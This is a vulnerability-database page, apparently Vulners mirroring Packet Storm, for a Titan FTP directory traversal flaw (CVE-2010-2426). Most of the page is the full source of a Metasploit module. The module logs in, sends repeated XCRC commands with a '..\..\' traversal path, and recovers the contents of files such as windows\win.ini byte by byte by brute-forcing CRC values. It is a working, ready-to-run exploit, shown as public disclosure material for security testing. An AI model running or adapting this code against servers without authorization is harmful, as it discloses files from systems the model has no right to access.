Lucene search
K

Titan FTP XCRC Directory Traversal Information Disclosure

🗓️ 01 Sep 2024 00:00:00Reported by jduck, Brandon McCann [at]zeknox, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 183 Views

Titan FTP XCRC Directory Traversal Information Disclosur

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-2426
29 May 201815:50
circl
CVE
CVE-2010-2426
23 Jun 201017:13
cve
Cvelist
CVE-2010-2426
23 Jun 201017:13
cvelist
Metasploit
Titan FTP XCRC Directory Traversal Information Disclosure
24 Jan 201321:29
metasploit
NVD
CVE-2010-2426
24 Jun 201012:17
nvd
OpenVAS
Titan FTP Server < 8.30.1231 Directory Traversal Vulnerabilities
2 Jul 201000:00
openvas
OpenVAS
Titan FTP Server 'XCRC' and 'COMB' Directory Traversal Vulnerabilities
2 Jul 201000:00
openvas
Prion
Directory traversal
24 Jun 201012:17
prion
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Ftp  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def proto  
'ftp'  
end  
  
def initialize  
super(  
'Name' => 'Titan FTP XCRC Directory Traversal Information Disclosure',  
'Description' => %q{  
This module exploits a directory traversal vulnerability in the XCRC command  
implemented in versions of Titan FTP up to and including 8.10.1125. By making  
sending multiple XCRC command, it is possible to disclose the contents of any  
file on the drive with a simple CRC "brute force" attack.  
  
Although the daemon runs with SYSTEM privileges, access is limited to files  
that reside on the same drive as the FTP server's root directory.  
},  
'Author' =>  
[  
'jduck',  
'Brandon McCann @zeknox <bmccann[at]accuvant.com>',  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2010-2426' ],  
[ 'OSVDB', '65533'],  
[ 'URL', 'https://seclists.org/bugtraq/2010/Jun/160' ]  
],  
'DisclosureDate' => 'Jun 15 2010'  
)  
  
register_options(  
[  
Opt::RPORT(21),  
OptString.new('TRAVERSAL', [ true, "String to traverse to the drive's root directory", "..\\..\\" ]),  
OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'windows\\win.ini'])  
])  
end  
  
  
def run_host(ip)  
  
c = connect_login  
return if not c  
  
path = datastore['TRAVERSAL'] + datastore['PATH']  
  
res = send_cmd( ['XCRC', path, "0", "9999999999"], true )  
if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)  
print_error("Unable to obtain file size! File probably doesn't exist.")  
return  
end  
file_size = $1.to_i  
  
update_interval = 1.5  
last_update = Time.now - update_interval  
  
old_crc = 0  
file_data = ''  
file_size.times { |off|  
res = send_cmd( ['XCRC', path, "0", (off+1).to_s], true )  
if not (res =~ /250 (.*)\r?\n/)  
raise RuntimeError, "Unable to obtain XCRC of byte #{off}!"  
end  
  
crc = $1.to_i(16)  
if (crc == 0)  
raise RuntimeError, "Unable to decode CRC: #{$1}"  
end  
  
ch = char_from_crc(crc, old_crc)  
if not (ch)  
raise RuntimeError, ("Unable to find a CRC match for 0x%x" % crc)  
end  
  
# got this byte ;)  
file_data << ch  
old_crc = crc  
  
if (Time.now - last_update) >= update_interval  
progress(file_size, off)  
last_update = Time.now  
end  
}  
  
progress(file_size, file_size)  
  
fname = datastore['PATH'].gsub(/[\/\\]/, '_')  
p = store_loot("titanftp.traversal", "text/plain", ip, file_data, fname)  
print_good("Saved in: #{p}")  
vprint_status(file_data.inspect)  
  
disconnect  
  
end  
  
#  
# Return a character code from the crc, or nil on failure  
#  
def char_from_crc(crc, old_crc)  
256.times { |x|  
ch = x.chr  
if (Zlib.crc32(ch, old_crc) == crc)  
return ch  
end  
}  
nil  
end  
  
def progress(total, current)  
done = (current.to_f / total.to_f) * 100  
percent = "%3.2f%%" % done.to_f  
print_status("Obtaining file contents - %7s done (%d/%d bytes)" % [percent, current, total])  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 24
EPSS0.30242
183